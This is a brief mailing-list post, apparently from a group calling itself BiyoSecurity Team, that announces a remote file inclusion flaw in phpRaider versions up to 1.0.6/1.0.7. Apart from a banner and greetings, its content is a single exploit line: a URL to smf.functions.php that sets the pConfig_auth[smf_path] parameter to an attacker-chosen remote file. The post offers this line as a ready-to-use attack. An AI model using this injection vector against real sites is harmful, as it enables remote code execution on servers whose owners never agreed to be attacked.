[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

phpRaider <= v1.0.6,7 Maybe Other Versions Remote File include Vulnerable



--==+===================            | BiyoSecurity Team |               =================+==--
--==+     phpRaider  <= v1.0.6,7 Maybe Other Versions Remote File include Vulnerable        +==--
--==+====================================================================================+==--
           [+] [Greetz] + [BiyoSecurity.com] + [Coderx.org] + [NetDevilz.Co] + [Megaturks.net]


[+]Author  : Crackers_Child

[+]Exploit : www.site.com/sc_path/authentication/smf/smf.functions.php?pConfig_auth[smf_path]=